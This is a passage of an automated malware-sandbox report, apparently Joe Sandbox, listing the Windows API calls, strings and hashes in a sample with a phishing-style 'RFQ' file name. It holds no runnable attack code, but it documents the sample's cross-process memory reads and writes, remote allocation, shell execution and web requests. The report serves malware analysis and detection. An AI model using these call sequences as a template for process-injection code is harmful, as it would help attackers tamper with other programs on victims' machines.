                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 708495834-557222456
                                                        • Opcode ID: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                        • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                        • Opcode Fuzzy Hash: ad57006ec1c627c896323e780c1188bc9069f79cba7bd3d755793e69e2ee2a80
                                                        • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                        APIs
                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                        • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                        • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                        • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: \$]$h
                                                        • API String ID: 4104443479-3262404753
                                                        • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                        • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                        • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                        • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                        APIs
                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                        • String ID: <$@
                                                        • API String ID: 2417854910-1426351568
                                                        • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                        • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                        • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                        • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3705125965-3916222277
                                                        • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                        • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                        • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                        • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                        APIs
                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem
                                                        • String ID: 0
                                                        • API String ID: 135850232-4108050209
                                                        • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                        • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                        • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                        • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                        • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                        • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                        • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: AU3_GetPluginDetails
                                                        • API String ID: 145871493-4132174516
                                                        • Opcode ID: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                                                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                        • Opcode Fuzzy Hash: 4f1385bb4795fe3ea514fff6b1d5a080d1b27c3bfb87bec215dc83ab5cae4363
                                                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: SysMonthCal32
                                                        • API String ID: 2326795674-1439706946
                                                        • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                        • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                        • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 3375834691-2298589950
                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: $<
                                                        • API String ID: 4104443479-428540627
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID: \VH
                                                        • API String ID: 1682464887-234962358
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID: \VH
                                                        • API String ID: 1682464887-234962358
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID: \VH
                                                        • API String ID: 1682464887-234962358
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: \VH
                                                        • API String ID: 2507767853-234962358
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: \VH
                                                        • API String ID: 2507767853-234962358
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                        Strings
                                                        Similarity
                                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                        • String ID: crts
                                                        • API String ID: 943502515-3724388283
                                                        APIs
                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                        Strings
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                        Strings
                                                        Similarity
                                                        • API ID: ErrorMode$LabelVolume
                                                        • String ID: \VH
                                                        • API String ID: 2006950084-234962358
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • GetMenuItemInfoW.USER32 ref: 00449727
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                        • DrawMenuBar.USER32 ref: 00449761
                                                        Strings
                                                        Similarity
                                                        • API ID: Menu$InfoItem$Draw_malloc
                                                        • String ID: 0
                                                        • API String ID: 772068139-4108050209
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_wcscpy
                                                        • String ID: 3, 3, 8, 1
                                                        • API String ID: 3469035223-357260408
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                                        • API String ID: 2574300362-3530519716
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpCreateFile
                                                        • API String ID: 2574300362-275556492
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpSendEcho
                                                        • API String ID: 2574300362-58917771
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                        • __itow.LIBCMT ref: 004699CD
                                                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                        • __itow.LIBCMT ref: 00469A97
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                        • ScreenToClient.USER32(?,?), ref: 00449A80
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        APIs
                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                        APIs
                                                        • GetParent.USER32(?), ref: 004503C8
                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                        Similarity
                                                        • API ID: Proc$Parent
                                                        • String ID:
                                                        • API String ID: 2351499541-0
                                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                        Similarity
                                                        • API ID: Message$Peek$DispatchTranslate
                                                        • String ID:
                                                        • API String ID: 1795658109-0
                                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                        APIs
                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                        APIs
                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                        • _wcslen.LIBCMT ref: 00449519
                                                        • _wcslen.LIBCMT ref: 00449526
                                                        Similarity
                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                        • String ID:
                                                        • API String ID: 2886238975-0
                                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                        APIs
                                                        Similarity
                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                        • String ID:
                                                        • API String ID: 1792727568-0
                                                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                        APIs
                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                        Similarity
                                                        • API ID: Window$Long$AttributesLayered
                                                        • String ID:
                                                        • API String ID: 2169480361-0
                                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
